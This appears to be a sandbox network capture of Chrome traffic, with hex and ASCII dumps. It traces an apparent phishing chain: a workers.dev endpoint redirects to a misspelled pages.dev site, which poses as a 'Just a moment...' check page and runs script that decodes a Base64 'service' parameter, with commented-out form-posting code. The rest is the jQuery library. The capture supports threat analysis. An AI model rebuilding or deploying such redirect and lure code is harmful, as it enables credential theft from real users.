                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:25 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:25 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 74
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FzX89%2BKNpHvtubrBW7QcWzoGeiNPGQ3qNrlHCHjCIFNGhgCvtVNz4u6%2BoYABKGbf5vMKPbyCg71%2B61Np6FI2r1%2FKZgxMC5mzFoZbaVzvQvLV2PscePRPktJlK%2FejFcjuHueEd31JDH14ll89wdeVxUgQfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd26d946c33e-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1520&rtt_var=586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1085&delivery_rate=1843434&cwnd=217&unsent_bytes=0&cid=0edcf8434feeee86&ts=1206&x=0"
                                                                                                                                                                                                                                      2025-01-07 17:52:25 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6f 72 70 6f 73 61 6c 2d 61 63 68 2e 70 61 67 65 73 2e 64 65 76 2f 23 3f 73 65 72 76 69 63 65 3d 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"status":"success","message":"https://porposal-ach.pages.dev/#?service="}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.1649719188.114.96.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC357OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      Host: tiny-hat-eab8.pagenew.workers.dev
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC895INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:27 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 74
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rkrs78bmPKoMwQVlR0zYxOnt02mNUPkUV5wFpVsUQC8TRiZvrtfZRiDL7rWaynmvUdQtiulTL6kT%2Ba2vEBq3sCKskbHhp8nusS%2F0c1gPiMAOtSXyRKYF%2BUMvobr%2BS4%2BkY3xJXRx7TbCn4IoiFzE5eKhYRTs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd34fa3743d5-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9291&min_rtt=1794&rtt_var=5286&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=935&delivery_rate=1627647&cwnd=241&unsent_bytes=0&cid=1f5b02366d2b1990&ts=1284&x=0"
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6f 72 70 6f 73 61 6c 2d 61 63 68 2e 70 61 67 65 73 2e 64 65 76 2f 23 3f 73 65 72 76 69 63 65 3d 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"status":"success","message":"https://porposal-ach.pages.dev/#?service="}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.1649717172.66.47.744436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC651OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      Host: porposal-ach.pages.dev
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MC71dXpWGQI64kCw749eZaBbCys%2F5bCntEdqlPRtv79axd3bLAUc1JZSUjyL7zQ3OkRy1cftoHoVRBlCbreJG%2B1c6mHogo0APKeJR1ichFXbLGCJC08WzEDEUV7BytNINTQTN7bPRWt8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd34ff3141b4-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9480&min_rtt=2123&rtt_var=5364&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1229&delivery_rate=1375412&cwnd=199&unsent_bytes=0&cid=c4e910bc00b7cc05&ts=192&x=0"
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC436INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                                                                                                                                                                                                      Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC1369INData Raw: 31 5d 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 68 61 73 68 32 5b 31 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 68 61 73 68 56 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6e 61 6d 65 20 3d 20 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 27 73 65 72 76 69 63 65 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 44 65 63 6f 64 65 20 74 68 65 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 76 61 6c 75 65 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 56 61 6c 75 65 20 3d 20 61 74 6f 62 28 6e 61 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f
                                                                                                                                                                                                                                      Data Ascii: 1]; // console.log(hash2[1]); const urlParams = new URLSearchParams(hashValue); const name = urlParams.get('service'); // Decode the Base64-encoded value var decodedValue = atob(name); console.lo
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC1369INData Raw: 4a 69 4d 44 64 6b 4f 54 6c 6d 4d 6d 56 6c 4e 54 46 6a 5a 6a 45 34 59 6a 4a 6d 5a 57 4e 6d 4e 6a 63 77 4d 6a 6c 69 4d 6a 67 32 5a 6d 59 7a 5a 54 64 6d 4d 7a 45 30 5a 57 46 68 4f 44 63 7a 5a 6a 64 69 5a 54 67 32 4f 44 52 6a 5a 6a 45 34 4e 32 52 68 4f 54 55 32 49 6e 30 25 33 44 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 70 72 6f 63 65 73 73 44 61 74 61 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 6d 69 6d 65 54 79 70 65 3a 20 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 63 6f 6e 74 65 6e 74 54 79 70 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 64 61 74 61 3a 20 66 6f 72 6d 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                      Data Ascii: JiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D", // }, // processData: false, // mimeType: "multipart/form-data", // contentType: false, // data: form,
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC363INData Raw: 6f 72 74 20 21 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 2e 73 74 61 74 75 73 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6a 61 76 61 73 63 72 69 70 74 43 61 6c 6c 62 61 63 6b 28 29 0a 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 44 45 57 45 20 2d 2d 3e 0a 20 20 20
                                                                                                                                                                                                                                      Data Ascii: ort ! "; } console.log(error.status); }); } setTimeout(() => { javascriptCallback() }, 1000); // }); </script> ... END DEWE -->
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.1649722151.101.66.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:26 UTC577OUTGET /jquery-3.7.1.min.js HTTP/1.1
                                                                                                                                                                                                                                      Host: code.jquery.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Origin: https://porposal-ach.pages.dev
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://porposal-ach.pages.dev/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 87533
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                      ETag: "28feccc0-155ed"
                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:27 GMT
                                                                                                                                                                                                                                      Age: 1331133
                                                                                                                                                                                                                                      X-Served-By: cache-lga21978-LGA, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                      X-Cache-Hits: 1516, 27
                                                                                                                                                                                                                                      X-Timer: S1736272347.053558,VS0,VE0
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                      Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 63 65 2e 66 6e 3d 63 65 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 74 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 63 65 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 65 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                      Data Ascii: ==t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 22 2b 28 74 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 65 29 7d 2c 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 69 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 75 65 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                      Data Ascii: "+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 74 75 72 6e 20 67 28 61 29 7d 2c 67 75 69 64 3a 31 2c 73 75 70 70 6f 72 74 3a 6c 65 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 63 65 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6f 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 63 65 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 76 61 72 20 70 65 3d 6f 65 2e
                                                                                                                                                                                                                                      Data Ascii: turn g(a)},guid:1,support:le}),"function"==typeof Symbol&&(ce.fn[Symbol.iterator]=oe[Symbol.iterator]),ce.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var pe=oe.
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 2c 22 2b 67 65 2b 22 2a 22 29 2c 6d 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 67 65 2b 22 29 22 2b 67 65 2b 22 2a 22 29 2c 78 3d 6e 65 77 20 52 65 67 45 78 70 28 67 65 2b 22 7c 3e 22 29 2c 6a 3d 6e 65 77 20 52 65 67 45 78 70 28 67 29 2c 41 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 74 2b 22 24 22 29 2c 44 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 74 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 74 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 74 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 70 29 2c 50 53 45 55 44 4f
                                                                                                                                                                                                                                      Data Ascii: gExp("^"+ge+"*,"+ge+"*"),m=new RegExp("^"+ge+"*([>+~]|"+ge+")"+ge+"*"),x=new RegExp(ge+"|>"),j=new RegExp(g),A=new RegExp("^"+t+"$"),D={ID:new RegExp("^#("+t+")"),CLASS:new RegExp("^\\.("+t+")"),TAG:new RegExp("^("+t+"|[*])"),ATTR:new RegExp("^"+p),PSEUDO
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 26 28 75 3d 4c 2e 65 78 65 63 28 74 29 29 29 69 66 28 69 3d 75 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 70 29 7b 69 66 28 21 28 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 20 69 66 28 66 26 26 28 61 3d 66 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 61 29 26 26 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 7b 69 66 28 75 5b 32 5d 29 72 65 74 75 72 6e 20 6b 2e 61 70 70 6c 79 28 6e 2c 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 29 2c 6e 3b 69 66 28 28 69 3d 75
                                                                                                                                                                                                                                      Data Ascii: &(u=L.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return k.call(n,a),n}else if(f&&(a=f.getElementById(i))&&I.contains(e,a)&&a.id===i)return k.call(n,a),n}else{if(u[2])return k.apply(n,e.getElementsByTagName(t)),n;if((i=u
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 61 29 7b 72 65 74 75 72 6e 20 46 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 46 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                                                                                                                                                                                                      Data Ascii: e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function X(a){return F(function(o){return o=+o,F(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function U(e){return e&&"undefined"!=typeof e.getElementsByT
